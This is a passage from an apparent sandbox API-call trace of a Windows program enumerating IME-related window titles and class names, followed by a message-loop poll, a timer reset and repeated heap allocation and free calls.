lpClassName="IME") returned 3 [0140.253] GetWindowTextW (in: hWnd=0x10346, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.254] GetClassNameW (in: hWnd=0x10346, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.254] GetWindowTextW (in: hWnd=0x20216, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.254] GetClassNameW (in: hWnd=0x20216, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.255] GetWindowTextW (in: hWnd=0x1033c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.255] GetClassNameW (in: hWnd=0x1033c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.255] GetWindowTextW (in: hWnd=0x10334, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.256] GetClassNameW (in: hWnd=0x10334, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.256] GetWindowTextW (in: hWnd=0x10326, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.256] GetClassNameW (in: hWnd=0x10326, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.256] GetWindowTextW (in: hWnd=0x1030e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.256] GetClassNameW (in: hWnd=0x1030e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.256] GetWindowTextW (in: hWnd=0x1030c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.256] GetClassNameW (in: hWnd=0x1030c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.257] GetWindowTextW (in: hWnd=0x1030a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.257] GetClassNameW (in: hWnd=0x1030a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.257] GetWindowTextW (in: hWnd=0x10312, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.257] GetClassNameW (in: hWnd=0x10312, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.258] GetWindowTextW (in: hWnd=0x20208, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.258] GetClassNameW (in: hWnd=0x20208, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.258] GetWindowTextW (in: hWnd=0x1027a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.258] GetClassNameW (in: hWnd=0x1027a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.258] GetWindowTextW (in: hWnd=0x10278, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.258] GetClassNameW (in: hWnd=0x10278, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.258] GetWindowTextW (in: hWnd=0x10276, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.259] GetClassNameW (in: hWnd=0x10276, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.259] GetWindowTextW (in: hWnd=0x10274, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.259] GetClassNameW (in: hWnd=0x10274, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.259] GetWindowTextW (in: hWnd=0x20202, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.259] GetClassNameW (in: hWnd=0x20202, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.260] GetWindowTextW (in: hWnd=0x10272, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.260] GetClassNameW (in: hWnd=0x10272, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.260] GetWindowTextW (in: hWnd=0x10270, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.260] GetClassNameW (in: hWnd=0x10270, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.260] GetWindowTextW (in: hWnd=0x1026e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.260] GetClassNameW (in: hWnd=0x1026e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.261] GetWindowTextW (in: hWnd=0x1025e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.261] GetClassNameW (in: hWnd=0x1025e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.261] GetWindowTextW (in: hWnd=0x10250, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.261] GetClassNameW (in: hWnd=0x10250, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.261] GetWindowTextW (in: hWnd=0x1024a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.262] GetClassNameW (in: hWnd=0x1024a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.262] GetWindowTextW (in: hWnd=0x10248, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.262] GetClassNameW (in: hWnd=0x10248, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.262] GetWindowTextW (in: hWnd=0x10246, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.262] GetClassNameW (in: hWnd=0x10246, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.262] GetWindowTextW (in: hWnd=0x10238, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.263] GetClassNameW (in: hWnd=0x10238, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.263] GetWindowTextW (in: hWnd=0x10228, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.263] GetClassNameW (in: hWnd=0x10228, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.263] GetWindowTextW (in: hWnd=0x10220, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.263] GetClassNameW (in: hWnd=0x10220, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.264] GetWindowTextW (in: hWnd=0x1021c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.264] GetClassNameW (in: hWnd=0x1021c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.264] GetWindowTextW (in: hWnd=0x10212, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.264] GetClassNameW (in: hWnd=0x10212, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.264] GetWindowTextW (in: hWnd=0x10210, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.264] GetClassNameW (in: hWnd=0x10210, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.265] GetWindowTextW (in: hWnd=0x40194, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.265] GetClassNameW (in: hWnd=0x40194, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.265] GetWindowTextW (in: hWnd=0x101c0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.265] GetClassNameW (in: hWnd=0x101c0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.265] GetWindowTextW (in: hWnd=0x101a8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.265] GetClassNameW (in: hWnd=0x101a8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.266] GetWindowTextW (in: hWnd=0x10190, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.266] GetClassNameW (in: hWnd=0x10190, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.266] GetWindowTextW (in: hWnd=0x100f6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0140.266] GetClassNameW (in: hWnd=0x100f6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0140.266] GetWindowTextW (in: hWnd=0x100f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.271] GetClassNameW (in: hWnd=0x100f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.272] GetWindowTextW (in: hWnd=0x100e8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.272] GetClassNameW (in: hWnd=0x100e8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.272] GetWindowTextW (in: hWnd=0x100dc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.272] GetClassNameW (in: hWnd=0x100dc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.273] GetWindowTextW (in: hWnd=0x401ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.273] GetClassNameW (in: hWnd=0x401ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.273] GetWindowTextW (in: hWnd=0x2003c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.273] GetClassNameW (in: hWnd=0x2003c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.273] GetWindowTextW (in: hWnd=0x101ca, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.273] GetClassNameW (in: hWnd=0x101ca, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.273] GetWindowTextW (in: hWnd=0x10076, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.274] GetClassNameW (in: hWnd=0x10076, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ff8 | out: hHeap=0x12c0000) returned 1 [0140.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0140.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f98 | out: hHeap=0x12c0000) returned 1 [0140.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0140.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7010 | out: hHeap=0x12c0000) returned 1 [0140.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70a0 | out: hHeap=0x12c0000) returned 1 [0140.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f68 | out: hHeap=0x12c0000) returned 1 [0140.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300388 | out: hHeap=0x12c0000) returned 1 [0140.275] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0140.275] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0140.275] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0140.275] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0140.275] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0140.275] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.275] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0140.275] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.275] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.275] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0140.276] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.276] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.276] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0140.276] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.276] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0140.276] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.276] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0140.276] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.276] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.276] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0140.276] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.276] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.276] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0140.276] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.276] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0140.276] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0140.277] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0140.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0140.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0140.277] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0140.277] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0140.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0140.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0140.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0140.278] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0140.278] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0140.278] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.278] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.278] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0140.278] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0140.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0140.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0140.278] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0140.278] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0140.278] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0140.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0140.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70b8 [0140.279] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0140.279] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70b8 | out: hHeap=0x12c0000) returned 1 [0140.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1316600 [0140.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6fe0 [0140.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd00 [0140.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13021b0 [0140.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ff8 [0140.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7028 [0140.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6dd0 [0140.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f08 [0140.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f98 [0140.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7010 [0140.280] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ed8 [0140.280] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6fb0 [0140.280] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e60 [0140.280] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b70b8 [0140.280] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7040 [0140.280] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f68 [0140.280] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7088 [0140.280] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b70a0 [0140.280] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6de8 [0140.280] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e00 [0140.280] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e18 [0140.280] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300270 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e30 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x13166c0 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x1305ff8 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e48 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efea0 [0140.281] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f20 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e78 [0140.281] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e90 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0140.281] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1c200) returned 0x15851a8 [0140.282] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.282] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f38 [0140.282] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0140.282] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1c200) returned 0x14f83c0 [0140.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f38 | out: hHeap=0x12c0000) returned 1 [0140.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e48 | out: hHeap=0x12c0000) returned 1 [0140.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0140.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1305ff8 | out: hHeap=0x12c0000) returned 1 [0140.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0140.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e30 | out: hHeap=0x12c0000) returned 1 [0140.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e78 | out: hHeap=0x12c0000) returned 1 [0140.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f20 | out: hHeap=0x12c0000) returned 1 [0140.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x15851a8 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e90 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300270 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7028 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ff8 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6dd0 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f98 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f08 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7010 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ed8 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e60 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6fb0 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70b8 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f68 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7040 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7088 | out: hHeap=0x12c0000) returned 1 [0140.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6de8 | out: hHeap=0x12c0000) returned 1 [0140.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70a0 | out: hHeap=0x12c0000) returned 1 [0140.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e00 | out: hHeap=0x12c0000) returned 1 [0140.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e18 | out: hHeap=0x12c0000) returned 1 [0140.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13021b0 | out: hHeap=0x12c0000) returned 1 [0140.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6fe0 | out: hHeap=0x12c0000) returned 1 [0140.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0140.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0140.399] RtlAllocateHeap (HeapHandle=0x12c0000, 